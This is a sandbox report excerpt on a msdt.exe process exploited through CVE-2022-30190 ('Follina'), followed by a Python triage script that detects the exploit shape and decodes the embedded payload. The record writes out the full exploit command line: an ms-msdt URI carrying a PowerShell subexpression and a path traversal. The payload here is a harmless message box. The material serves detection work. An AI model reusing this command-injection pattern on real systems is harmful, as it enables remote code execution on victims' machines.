Start date:03/06/2022
Path:C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Imagebase:0xab0000
File size:1508352 bytes
MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
Reputation:moderate
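Target ID 9 is where the exploit lands: msdt.exe, launched by WINWORD.EXE, receives an ms-msdt: URI whose IT_BrowseForFile parameter carries a PowerShell $( ... ) subexpression, followed by a ../ traversal to mpsigstub.exe; the Yara hits above fire on that same command line. The script below is an added example, not part of the Joe Sandbox report or of the cited Yara rule. It reduces the recorded command line to the indicators a detection engineer keys on, pulls the subexpression out with balanced-parenthesis matching, and decodes the embedded -EncodedCommand, which PowerShell defines as base64 over UTF-16LE. The indicator names and thresholds are this example's own.

```python
"""Triage of an msdt.exe command line for the CVE-2022-30190 ("Follina") shape.

Added example, not part of the Joe Sandbox report or of the Yara rule it cites.
SAMPLE_CMDLINE is the Target ID 9 command line copied from the report."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE_CMDLINE = (
    'C:\\Windows\\system32\\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param '
    '"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('
    '"powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0A'
    'ZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBX'
    'AGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgA'
    'JwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABs'
    'AG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))'
    'i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe'
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual ones.
ENCODED_CMD_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/]+=*)", re.IGNORECASE)


@dataclass
class Finding:
    indicators: List[str] = field(default_factory=list)
    subexpression: Optional[str] = None   # body of the $( ... ) in IT_BrowseForFile
    browse_target: Optional[str] = None   # what follows it, i.e. the "file" msdt is given
    decoded_payload: Optional[str] = None

    @property
    def is_follina(self) -> bool:
        # An ms-msdt URI plus a PowerShell subexpression inside IT_BrowseForFile is
        # the exploit shape; the remaining indicators only raise confidence.
        return {"ms-msdt-uri", "subexpression-in-browseforfile"} <= set(self.indicators)


def extract_subexpression(cmdline: str, param: str = "IT_BrowseForFile=") -> Optional[Tuple[str, str]]:
    """Return (body, trailing) for the first $( ... ) after `param`, honouring nested
    parentheses; `trailing` is the text after the closing paren up to whitespace."""
    start = cmdline.find(param)
    if start < 0:
        return None
    open_idx = cmdline.find("$(", start)
    if open_idx < 0:
        return None
    depth = 0
    for i in range(open_idx + 1, len(cmdline)):
        if cmdline[i] == "(":
            depth += 1
        elif cmdline[i] == ")":
            depth -= 1
            if depth == 0:
                rest = cmdline[i + 1:].split()
                return cmdline[open_idx + 2:i], (rest[0] if rest else "")
    return None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def triage(cmdline: str) -> Finding:
    f = Finding()
    low = cmdline.lower()
    if "msdt.exe" in low:
        f.indicators.append("msdt-image")
    if "ms-msdt:" in low:
        f.indicators.append("ms-msdt-uri")
    if "pcwdiagnostic" in low:
        f.indicators.append("pcwdiagnostic-pack")
    if re.search(r'it_rebrowseforfile=[^\s"]*\?', low):
        # A '?' inside the IT_RebrowseForFile path is the shape the public PoCs use.
        f.indicators.append("rebrowseforfile-question-mark")
    sub = extract_subexpression(cmdline)
    if sub is not None:
        f.indicators.append("subexpression-in-browseforfile")
        f.subexpression, f.browse_target = sub
    if cmdline.count("../") >= 5:  # threshold is this example's choice
        f.indicators.append("path-traversal")
    m = ENCODED_CMD_RE.search(cmdline)
    if m:
        f.indicators.append("encoded-command")
        try:
            f.decoded_payload = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            f.decoded_payload = None  # keep the indicator even if the blob is damaged
    return f


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print("Follina shape:", result.is_follina)
    print("Indicators:", ", ".join(result.indicators))
    print("Browse target:", result.browse_target)
    print("Decoded payload:", result.decoded_payload)
```

Run against the report's command line, the decoded payload is a Windows Forms MessageBox call rather than a downloader, which fits a test document; note also that the process list above shows no powershell.exe child of msdt.exe in this run, so the indicator that matters for detection is the msdt.exe command line itself, not a follow-on process.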

No disassembly